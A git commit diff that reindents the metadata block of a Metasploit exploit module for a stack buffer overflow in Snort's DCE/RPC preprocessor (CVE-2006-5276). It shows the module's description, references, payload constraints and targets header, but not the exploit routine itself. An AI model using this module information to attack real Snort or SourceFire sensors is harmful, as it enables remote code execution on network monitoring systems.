Modified for 8-space tabs

unstable
Carsten Maartmann-Moe 2012-04-08 16:09:28 -04:00
parent 89c1894e07
commit ce0de02a2a
1 changed files with 17 additions and 20 deletions

View File

@ -19,12 +19,12 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Stack-based buffer overflow in the DCE/RPC preprocessor in Snort',
'Description' => %q{
This module allows remote attackers to execute arbitrary code exploiting the Snort
service via crafted SMB traffic. The vulnerability is caused due to a boundary error
within the DCE/RPC preprocessor when reassembling SMB Write AndX requests. This can
be exploited to cause a stack-based buffer overflow via a specially crafted packet
'Name' => 'Stack-based buffer overflow in the DCE/RPC preprocessor in Snort',
'Description' => %q{
This module allows remote attackers to execute arbitrary code exploiting the
Snort service via crafted SMB traffic. The vulnerability is caused due to a boundary
error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests. This
can be exploited to cause a stack-based buffer overflow via a specially crafted packet
sent on a network that is monitored by Snort.
Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.
@ -34,27 +34,24 @@ class Metasploit3 < Msf::Exploit::Remote
Original discovery by Neel Mehta, IBM Internet Security Systems X-Force.
},
'Author' =>
[
'Carsten Maartmann-Moe <carsten@carmaa.com>'
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Platform' => 'win',
'Author' => [ 'Carsten Maartmann-Moe <carsten@carmaa.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Platform' => 'win',
'References' =>
[
[ 'OSVDB', '67988' ],
[ 'CVE', 'CVE-2006-5276' ],
[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
],
'DefaultOptions' =>
'DefaultOptions'=>
{
'EXITFUNC' => 'thread',
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 390,
'BadChars' => "\x00",
'Space' => 390,
'BadChars' => "\x00",
'DisableNops' => true,
},
'Targets' =>
@ -66,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Feb 19 2007',
'DefaultTarget' => 0))
'Privileged' => true,
'DisclosureDate'=> 'Feb 19 2007',
'DefaultTarget' => 0))
register_options(
[